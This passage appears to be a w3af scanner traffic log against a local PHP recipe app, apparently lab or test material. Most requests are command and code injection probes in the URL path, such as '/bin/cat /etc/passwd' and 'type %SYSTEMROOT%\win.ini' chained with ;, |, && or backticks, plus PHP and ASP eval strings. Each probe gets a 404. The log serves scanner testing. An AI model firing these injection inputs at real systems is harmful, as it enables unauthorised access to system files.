        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="262">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27nvkpe%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27nvkpe%27x5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27nvkpe%27x5'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="265">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27nvkpe%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27nvkpe%27%2A5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27nvkpe%27%2A5'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="266">
                <http-request>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27nvkpe%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about echo+str_repeat%28%27nvkpe%27%2C5%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='echo+str_repeat%28%27nvkpe%27%2C5%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="267">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="268">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="269">
                <http-request>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="270">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22nvkpe%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22nvkpe%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="271">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="272">
                <http-request>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="273">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="274">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="275">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="276">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="277">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="278">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="280">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="281">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60/bin/cat+/etc/passwd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60/bin/cat+/etc/passwd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="282">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="283">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="285">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Gm4UzWKx HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about Gm4UzWKx has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='Gm4UzWKx'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="291">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="307">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="312">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%27b%22c%27d%22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%27b%22c%27d%22'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="317">
                <http-request>
